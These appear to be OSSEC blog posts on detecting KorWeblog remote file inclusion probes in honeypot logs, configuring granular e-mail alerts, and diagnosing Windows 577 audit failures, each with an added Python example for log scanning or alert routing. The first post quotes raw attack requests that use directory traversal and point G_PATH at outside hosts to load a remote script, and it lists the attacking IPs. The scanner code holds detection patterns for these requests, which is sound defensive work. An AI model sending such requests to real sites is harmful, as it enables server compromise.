Hammered by web attacks (KorWeblog)

Some of my web honeypots are being hammered by attacks against KorWeblog. In fact, even my real systems are receiving a lot of these too. It looks like they are trying to exploit an old vulnerability (from 2005), which sounds odd to me.

Example of an alert from ossec:

OSSEC HIDS Notification.
2007 Jun 27 17:07:30

Received From: xx->/var/log/httpd/xx.access.log
Rule: 31106 fired (level 12) -> “A web attack returned code 200 (success).”
Portion of the log(s):

8.10.120.85 - - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 200 6349 "-" "libwww-perl/5.805"

Just one honeypot (yes, one) in the last few days was “attacked” by the following IPs (25 different):

189.1.168.118
200.193.146.100
200.219.150.6
202.123.27.136
203.55.214.70
207.150.188.50
207.226.179.98
209.216.205.81
210.188.204.198
211.247.239.10
213.194.149.130
216.7.185.31
217.170.66.240
218.228.196.88
218.239.223.225
221.127.101.45
62.193.237.43
62.75.163.196
65.98.58.2
72.232.219.205
8.10.120.85
83.103.57.13
83.217.84.88
85.125.233.222
89.110.144.202

The logs look all the same:

200.193.146.100 - - [26/Jun/2007:16:37:37 -0300] "GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1" 200 6351 "-" "libwww-perl/5.79"
8.10.120.85 - - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 200 6349 "-" "libwww-perl/5.805"
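What these requests have in common is the shape of the query string: one parameter walks out of the web root (lng=../../include/main.inc) and another points the script at a remote URL (G_PATH=http://...), the classic PHP remote file inclusion pattern, and the server answered 200. The following is an added example, not code from the original post or from ossec, of the same check run over access-log lines: it parses the combined log format, flags parameters that carry a remote URL or a ../ sequence, and rates a hit higher when the status is 200, the way rule 31106 does. The two requests quoted above are reused as input (with plain ASCII dashes); the benign page view and the 404 line are constructed for comparison, and the level numbers (12 for a 200, 6 otherwise) are an assumption made here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format, the layout of the lines quoted above.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that fetches a remote script (remote file inclusion) ...
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# ... or that walks out of the web root (directory traversal / local include).
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')


def parse_line(line):
    """Split one access-log line into its fields; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry['status'] = int(entry['status'])
    return entry


def suspicious_params(target):
    """Return [(name, kind, value)] for query parameters that look like an include attack."""
    findings = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already URL-decodes once; decode a second time so a
        # double-encoded "%252e%252e/" is not missed.
        value = unquote(value)
        if REMOTE_RE.match(value):
            findings.append((name, 'remote-include', value))
        elif TRAVERSAL_RE.search(value):
            findings.append((name, 'traversal', value))
    return findings


def scan(lines):
    """Yield one dict per attack-looking request.

    Level 12 (assumed, after rule 31106) when the server answered 200, because
    the request may have succeeded; level 6 (assumed) for any other status.
    """
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = suspicious_params(entry['target'])
        if not findings:
            continue
        yield {
            'ip': entry['ip'],
            'status': entry['status'],
            'level': 12 if entry['status'] == 200 else 6,
            'user_agent': entry['ua'],
            'findings': findings,
        }


# Constructed sample: the two requests quoted in the post (ASCII dashes), a benign
# page view, and the same KorWeblog probe answered with 404, for comparison.
SAMPLE_LOG = [
    '200.193.146.100 - - [26/Jun/2007:16:37:37 -0300] "GET /*install/index.php?lng=../../include/main.inc&G_PATH=http://www.thiaguinho.net/id.txt? HTTP/1.1" 200 6351 "-" "libwww-perl/5.79"',
    '8.10.120.85 - - [27/Jun/2007:17:07:29 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://nicksom2d.sytes.net/ex/echo? HTTP/1.1" 200 6349 "-" "libwww-perl/5.805"',
    '10.0.0.5 - - [27/Jun/2007:17:10:00 -0300] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Jun/2007:17:11:00 -0300] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://example.invalid/x.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.805"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['level'], hit['ip'], hit['status'], hit['user_agent'], hit['findings'])
```

A 200 here only means the PHP script ran and returned a page, not that the remote include worked; whether `allow_url_fopen`/`allow_url_include` is on decides that, so the next thing to check on a real box is what that URL would have pulled in.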

I posted a few of the sites that were found on the WebAttacks Links page of the ossec wiki.

Granular e-mail alerting

One of the most popular feature requests for ossec that I have received lately was the availability of granular e-mail alerting options. Well, if you have been waiting for it, it is now available to be used. Just try our first beta release of version 1.2 and let us know how it goes.

Here are some examples of what you can do:

If you want to e-mail xx@y.z for every event in the group syslog, you can add the following to the ossec configuration:

  <email_alerts>
    <email_to>xx@y.z</email_to>
    <group>syslog</group>
  </email_alerts>

To e-mail (in SMS format) aa@y.z for every event with severity 10 or higher (note that SMS-format alerts are not grouped, so the e-mail is sent immediately):

  <email_alerts>
    <email_to>aa@y.z</email_to>
    <level>10</level>
    <format>sms</format>
  </email_alerts>

To e-mail bb@y.z for every event from rule 123 or rule 124:

  <email_alerts>
    <email_to>bb@y.z</email_to>
    <rule_id>123, 124</rule_id>
  </email_alerts>

To e-mail cc@y.z for every event with severity 12 or higher, from agent qwerty, without any delay (immediately):

  <email_alerts>
    <email_to>cc@y.z</email_to>
    <level>12</level>
    <event_location>qwerty</event_location>
    <do_not_delay />
  </email_alerts>

You just need to tweak it for your own needs. Send any questions to our mailing list or here in the comments.
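To see how the four blocks above combine for a given alert, here is an added example (not ossec's own code) that parses `<email_alerts>` blocks with the standard XML parser and routes an alert to every block it matches. The matching rules it models follow the descriptions above: `<level>` is a minimum, `<rule_id>` is a comma-separated list, `<group>` must be one of the alert's groups, `<event_location>` is compared with the agent name, and `sms` format or `<do_not_delay />` means the mail goes out immediately instead of being grouped. That all criteria inside one block must match together (AND), and the exact-match comparison of `event_location`, are assumptions made here; the `Alert` records are constructed.

```python
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple
import xml.etree.ElementTree as ET


@dataclass(frozen=True)
class EmailAlert:
    """One <email_alerts> block. Every criterion present must match (assumed: ANDed)."""
    email_to: str
    level: Optional[int] = None              # minimum severity
    group: Optional[str] = None              # alert must carry this group
    rule_ids: FrozenSet[int] = frozenset()   # alert's rule id must be listed
    event_location: Optional[str] = None     # agent name the event came from
    sms_format: bool = False                 # <format>sms</format>: short, not grouped
    do_not_delay: bool = False               # <do_not_delay />: full format, not grouped

    def matches(self, alert: 'Alert') -> bool:
        if self.level is not None and alert.level < self.level:
            return False
        if self.group is not None and self.group not in alert.groups:
            return False
        if self.rule_ids and alert.rule_id not in self.rule_ids:
            return False
        if self.event_location is not None and alert.location != self.event_location:
            return False
        return True

    @property
    def immediate(self) -> bool:
        return self.sms_format or self.do_not_delay


@dataclass(frozen=True)
class Alert:
    rule_id: int
    level: int
    groups: FrozenSet[str]
    location: str


def _text(node, tag) -> Optional[str]:
    """Stripped text of a child element, or None when absent/empty."""
    return (node.findtext(tag) or '').strip() or None


def load_email_alerts(xml_text: str) -> List[EmailAlert]:
    """Parse every <email_alerts> block found under the root element."""
    root = ET.fromstring(xml_text.strip())
    blocks = []
    for node in root.iter('email_alerts'):
        raw_ids = _text(node, 'rule_id') or ''
        blocks.append(EmailAlert(
            email_to=_text(node, 'email_to'),
            level=int(_text(node, 'level')) if _text(node, 'level') else None,
            group=_text(node, 'group'),
            rule_ids=frozenset(int(r) for r in raw_ids.split(',') if r.strip()),
            event_location=_text(node, 'event_location'),
            sms_format=(_text(node, 'format') or '').lower() == 'sms',
            do_not_delay=node.find('do_not_delay') is not None,
        ))
    return blocks


def route(alert: Alert, blocks: List[EmailAlert]) -> List[Tuple[str, str]]:
    """Return (recipient, 'immediate' or 'queued') for each block the alert matches."""
    return [(b.email_to, 'immediate' if b.immediate else 'queued')
            for b in blocks if b.matches(alert)]


# Constructed: the four blocks from the post, wrapped in a root element.
CONFIG_XML = """<ossec_config>
  <email_alerts>
    <email_to>xx@y.z</email_to>
    <group>syslog</group>
  </email_alerts>
  <email_alerts>
    <email_to>aa@y.z</email_to>
    <level>10</level>
    <format>sms</format>
  </email_alerts>
  <email_alerts>
    <email_to>bb@y.z</email_to>
    <rule_id>123, 124</rule_id>
  </email_alerts>
  <email_alerts>
    <email_to>cc@y.z</email_to>
    <level>12</level>
    <event_location>qwerty</event_location>
    <do_not_delay />
  </email_alerts>
</ossec_config>"""

if __name__ == '__main__':
    blocks = load_email_alerts(CONFIG_XML)
    # A level-13 alert from agent qwerty: goes to aa@y.z (sms) and cc@y.z, both immediately.
    print(route(Alert(5555, 13, frozenset({'ossec'}), 'qwerty'), blocks))
```

One consequence worth noticing: a level-10 syslog event from rule 124 on agent qwerty matches three of the four blocks (xx, aa and bb) but not cc, because 10 is below that block's minimum of 12, so one event can produce several mails to several people.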

Download it from here (always use the latest package available): beta snapshots.

Multiple 577 entries in the eventlog (from Windows)

I was monitoring the Windows logs from a client network and I noticed that a few boxes were constantly generating audit failure 577 events:

WinEvtLog: Security: AUDIT_FAILURE(577): Security: xxx: XX-HQ: YY-HQ: Privileged Service Called: Server: Security Primary User Name: abc Primary Domain: XX-HQ Privileges: SeIncreaseBasePriorityPrivilege

To make it worse, ossec was alerting me by e-mail every time with 'Rule: 18151 fired (level 10) -> "Multiple failed attempts to perform a privileged operation by the same user."'. My initial thought was that these machines were infected by spyware or something similar, so I went and investigated them. I didn't want to disable this rule on ossec, because it is fairly important for "normal" systems.

After some research, I found out that their problem was having Windows XP installed 🙂 (without the latest Service Pack). Basically, there is a bug in Windows that causes this behavior. If you ever experience this problem, check the following link: http://support.microsoft.com/kb/831905 and make sure to install the latest updates.
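The correlation behind rule 18151, as an added example (not ossec's implementation): parse the eventlog line into its fields, keep a sliding window of AUDIT_FAILURE 577 events per (computer, user), and fire once when the window fills. The field layout is taken from the line quoted above; the threshold of 8 events in 120 seconds, the timestamps, the users and the optional `xp_base_priority_noise` filter are assumptions made here. The filter shows how the KB831905 pattern could be excluded without switching the rule off, but it would also hide a real failed use of that privilege on the same box, so the fix is still to patch, as the post says.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# "WinEvtLog: <log>: <type>(<id>): <source>: <user>: <domain>: <computer>: <message>",
# the layout of the 577 line quoted above.
EVT_RE = re.compile(
    r'^WinEvtLog: (?P<log>[^:]+): (?P<type>[A-Z_]+)\((?P<id>\d+)\): (?P<source>[^:]+): '
    r'(?P<user>[^:]*): (?P<domain>[^:]*): (?P<computer>[^:]+): (?P<message>.*)$'
)
PRIMARY_USER_RE = re.compile(r'Primary User Name: (?P<name>\S+)')
PRIVILEGES_RE = re.compile(r'Privileges: (?P<privs>.+)$')


def parse_event(line):
    """Split one eventlog line; the user named in the message wins over the header user."""
    m = EVT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev['id'] = int(ev['id'])
    pu = PRIMARY_USER_RE.search(ev['message'])
    pr = PRIVILEGES_RE.search(ev['message'])
    ev['primary_user'] = pu.group('name') if pu else ev['user']
    ev['privileges'] = tuple(pr.group('privs').split()) if pr else ()
    return ev


def xp_base_priority_noise(ev):
    """Assumed filter for the KB831905 pattern: a failed call asking only for
    SeIncreaseBasePriorityPrivilege. Patching the box is the real fix."""
    return ev['privileges'] == ('SeIncreaseBasePriorityPrivilege',)


class PrivilegedFailureCorrelator:
    """Fire when one (computer, user) logs `threshold` AUDIT_FAILURE 577 events
    within `window`, like a frequency rule. One burst yields one alert."""

    def __init__(self, threshold=8, window=timedelta(seconds=120), ignore=None):
        self.threshold = threshold
        self.window = window
        self.ignore = ignore or (lambda ev: False)
        self.seen = defaultdict(deque)

    def feed(self, when, line):
        ev = parse_event(line)
        if ev is None or ev['type'] != 'AUDIT_FAILURE' or ev['id'] != 577 or self.ignore(ev):
            return None
        key = (ev['computer'], ev['primary_user'])
        q = self.seen[key]
        q.append(when)
        while q and when - q[0] > self.window:   # drop events older than the window
            q.popleft()
        if len(q) >= self.threshold:
            alert = {'computer': key[0], 'user': key[1], 'count': len(q),
                     'first': q[0], 'last': when}
            q.clear()                             # reset so the burst fires once
            return alert
        return None


def replay(events, correlator):
    """Feed (timestamp, line) pairs in order and collect the alerts raised."""
    alerts = []
    for when, line in events:
        alert = correlator.feed(when, line)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample input in the format of the line above.
def make_event(user, privs, event_type='AUDIT_FAILURE', computer='YY-HQ'):
    return (f'WinEvtLog: Security: {event_type}(577): Security: {user}: XX-HQ: {computer}: '
            f'Privileged Service Called: Server: Security Primary User Name: {user} '
            f'Primary Domain: XX-HQ Privileges: {privs}')


BASE = datetime(2007, 6, 27, 17, 7, 30)
SAMPLE_EVENTS = (
    # an unpatched XP box: user abc fails SeIncreaseBasePriorityPrivilege every 5 s
    [(BASE + timedelta(seconds=5 * i), make_event('abc', 'SeIncreaseBasePriorityPrivilege')) for i in range(10)]
    # a few genuine failures by another user, below the threshold
    + [(BASE + timedelta(seconds=30 * i), make_event('bob', 'SeDebugPrivilege')) for i in range(3)]
    # a successful privileged call, which the correlator must ignore
    + [(BASE + timedelta(seconds=7), make_event('abc', 'SeDebugPrivilege', event_type='AUDIT_SUCCESS'))]
)
SAMPLE_EVENTS.sort(key=lambda e: e[0])

if __name__ == '__main__':
    print(replay(SAMPLE_EVENTS, PrivilegedFailureCorrelator()))
    print(replay(SAMPLE_EVENTS, PrivilegedFailureCorrelator(ignore=xp_base_priority_noise)))
```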
